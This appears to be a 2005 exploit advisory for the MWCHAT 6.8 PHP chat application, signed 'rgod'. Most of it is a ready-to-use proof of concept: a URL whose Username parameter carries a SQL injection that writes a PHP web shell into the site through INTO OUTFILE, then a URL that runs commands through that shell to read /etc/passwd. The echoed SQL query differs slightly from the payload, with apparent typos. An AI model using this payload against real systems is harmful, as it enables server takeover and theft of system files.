MWCHAT 6.8 SQL injection and remote command execution exploit.
41110b8a0d1dc327dbda05febcf2566569f15a2637fd71c9e8c0e5d01e2bc6f7
20.23 21/10/2005
MWCHAT 6.8 SQL INJECTION / REMOTE COMMANDS EXECUTION
software:
site: http://www.appindex.net
description: a php chat
no need for exploit code, poc:
http://[target]/mwchat/chat.php?Username='UNION%20SELECT%200,0,0,0,'<?system($_GET[cmd]);?>',0,0,0%20INTO%20OUTFILE%20'../../www/mwchat/shell.php'%20FROM%20chat_text/*&Sequence_Check=&Lang=en&Resolution=1280&Room=prova
query in push.php becomes:
SELECT * FROM chat_text WHERE to_username=''UNION SELECT 0,0,0,0,'<?system($GET[cmd]);?>',0,0,0 INTO OUTFILE '../../WWW/wmchat/shell.php' FROM chat_text/* AND room='$Room' AND id > '' ORDER BY id
then you can launch commands:
http://[target]/mwchat/shell.php?cmd=cat%20/etc/passwd
rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta.it